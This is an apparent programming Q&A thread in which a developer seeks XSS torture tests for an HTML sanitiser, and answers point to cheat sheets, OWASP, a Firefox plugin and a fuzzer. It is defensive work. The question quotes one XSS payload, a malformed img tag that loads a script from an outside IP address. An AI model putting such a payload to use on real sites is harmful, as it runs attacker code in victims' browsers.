views:

1203

answers:

5

Hi,

I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror

<img src=""http://www.a.com/a.jpg&lt;script type=text/javascript 
src="http://1.2.3.4:81/xss.js"&gt;" /><<img 
src=""http://www.a.com/a.jpg&lt;/script&gt;"

I know there's a Mime Torture Test which comprises of several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivilent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.

If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.

Thanks in advance :-)

Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.

+12  A: 

Take a look at this XSS Cheat List : http://ha.ckers.org/xss.html

RealHowTo
Specifically the "XML format of the XSS Cheat Sheet", which I missed the first time I saw that page..
dbr
+6  A: 

XSS Me is a great Firefox plugin you can run against your sanitizer.

The link to "XSS Me" is formatted wrong... The correct URL is https://addons.mozilla.org/en-US/firefox/addon/7598
Patjoh
Link corrected. Thanks for pointing it out!
+2  A: 

Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.

erickson
+2  A: 

You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) that throws random data at your Javascript trying to break it. It seems the Firefox team has used this with great success.

Eric Wendelin
A: 

I know Yahoo! (I think Rasmus Lerdorf wrote it) had a utility for stress testing applications (XSS, SQL and a lot more). I think it was released and then retracted, seeing as I haven't been able to find it anywhere.

Ross